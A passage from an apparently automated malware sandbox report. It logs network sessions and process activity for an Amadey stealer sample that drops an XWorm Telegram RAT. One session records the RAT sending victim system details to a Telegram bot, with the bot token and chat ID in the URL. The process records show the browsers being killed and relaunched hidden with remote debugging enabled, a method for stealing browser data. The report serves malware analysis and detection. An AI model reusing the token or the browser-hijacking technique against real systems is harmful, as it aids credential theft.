2024-11-21 21:13:12 UTC	12	IN	Data Raw: 66 69 6c 74 65 72 28 28 65 3d 0d 0a Data Ascii: filter((e=
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 3e 22 22 21 3d 3d 65 29 29 3b 74 68 69 73 2e 6c 61 79 6f 75 74 53 74 79 6c 65 3d 69 2e 69 60 24 7b 6e 2e 6c 65 6e 67 74 68 3e 30 3f 60 3a 68 6f 73 74 20 7b 24 7b 6e 2e 6a 6f 69 6e 28 22 3b 22 29 7d 7d 60 3a 22 22 7d 60 7d 7d 28 30 2c 6f 2e 67 6e 29 28 5b 72 2e 4c 4f 5d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 61 79 6f 75 74 43 6f 6e 66 69 67 22 2c 76 6f 69 64 20 30 29 2c 28 30 2c 6f 2e 67 6e 29 28 5b 72 2e 4c 4f 5d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 61 79 6f 75 74 53 74 79 6c 65 22 2c 76 6f 69 64 20 30 29 7d 2c 35 39 35 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 Data Ascii: 00006000>""!==e));this.layoutStyle=i.i`${n.length>0?`:host {${n.join(";")}}`:""}`}}(0,o.gn)([r.LO],c.prototype,"layoutConfig",void 0),(0,o.gn)([r.LO],c.prototype,"layoutStyle",void 0)},59561:function(e,t,n){"use strict";n.d(t,{Q:function(){return s}});v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50025	152.195.19.97	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:12 UTC	622	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: X9nsUlIue40Lh2xDAXDu2p Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:13 UTC	633	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 12150123 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Thu, 21 Nov 2024 21:13:12 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31 MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0 MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4 Server: ECAcc (nyd/D11E) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
2024-11-21 21:13:13 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50031	13.91.222.61	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:13 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiMkxNMFZ3SGZtL1FoSERMTXF4TGhQdz09IiwgImhhc2giOiJGRHN6TmwxYjkwQT0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-21 21:13:13 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-21 21:13:14 UTC	248	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 21:13:14 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-21 21:13:14 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	50157	162.159.61.3	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:14:53 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:14:53 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-21 21:14:54 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 21 Nov 2024 21:14:54 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e63b128da884269-EWR alt-svc: h3=":443"; ma=86400
2024-11-21 21:14:54 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPC)

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	50161	162.159.61.3	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:14:54 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:14:54 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	50195	20.110.205.119	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:15:09 UTC	1245	OUT	GET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
2024-11-21 21:15:10 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT Accept-Ranges: bytes ETag: "8d3dafd6e71fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=00AA082B214465520B5C1D15206D642A; domain=.msn.com; expires=Tue, 16-Dec-2025 21:15:10 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=00AA082B214465520B5C1D15206D642A; domain=c.msn.com; expires=Tue, 16-Dec-2025 21:15:10 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 28-Nov-2024 21:15:10 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 21-Nov-2024 21:25:10 GMT; path=/; SameSite=None; Secure; Date: Thu, 21 Nov 2024 21:15:09 GMT Connection: close Content-Length: 42
2024-11-21 21:15:10 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50152	149.154.167.220	443	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:18:47 UTC	450	OUT	GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-21 21:18:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 21:18:48 GMT Content-Type: application/json Content-Length: 441 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 21:18:48 UTC	441	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 33 30 30 34 30 35 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 65 61 6c 65 72 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 63 68 61 6c 6c 61 53 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 37 30 34 33 36 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 20 4d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 68 65 6e 63 68 61 6e 67 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 32 32 33 39 32 37 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 Data Ascii: {"ok":true,"result":{"message_id":1340,"from":{"id":6673004050,"is_bot":true,"first_name":"StealerBot","username":"MachallaSBot"},"chat":{"id":1470436579,"first_name":"H M","username":"chenchang1","type":"private"},"date":1732223927,"text":"\u2620 [XWorm

Target ID:	0
Start time:	16:10:59
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x6c0000
File size:	1'927'680 bytes
MD5 hash:	6AED281D1464E3A53839BBD9E7190535
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:11:03
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x7a0000
File size:	1'927'680 bytes
MD5 hash:	6AED281D1464E3A53839BBD9E7190535
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:11:04
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7a0000
File size:	1'927'680 bytes
MD5 hash:	6AED281D1464E3A53839BBD9E7190535
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:12:00
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7a0000
File size:	1'927'680 bytes
MD5 hash:	6AED281D1464E3A53839BBD9E7190535
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	16:12:33
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Imagebase:	0x7ff7e12c0000
File size:	13'960'143 bytes
MD5 hash:	F74588FC6A3342296CBB881D87C17300
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 13%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	16:12:35
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Imagebase:	0x7ff7e12c0000
File size:	13'960'143 bytes
MD5 hash:	F74588FC6A3342296CBB881D87C17300
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	16:12:41
Start date:	21/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Imagebase:	0x7ff7fdd30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:12:41
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:12:41
Start date:	21/11/2024
Path:	C:\Windows\System32\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Imagebase:	0x7ff788390000
File size:	272'384 bytes
MD5 hash:	19AB5AD061BF013EBD012D0682DF37E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:12:47
Start date:	21/11/2024
Path:	C:\Windows\System32\drivers\mstee.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff678400000
File size:	12'288 bytes
MD5 hash:	244C73253E165582DDC43AF4467D23DF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	16:12:47
Start date:	21/11/2024
Path:	C:\Windows\System32\drivers\mskssrv.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	34'816 bytes
MD5 hash:	26854C1F5500455757BC00365CEF9483
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	16:12:52
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM chrome.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:12:52
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:12:52
Start date:	21/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:12:53
Start date:	21/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	16:12:53
Start date:	21/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:12:56
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:12:56
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:12:57
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:12:58
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:12:58
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6a5670000
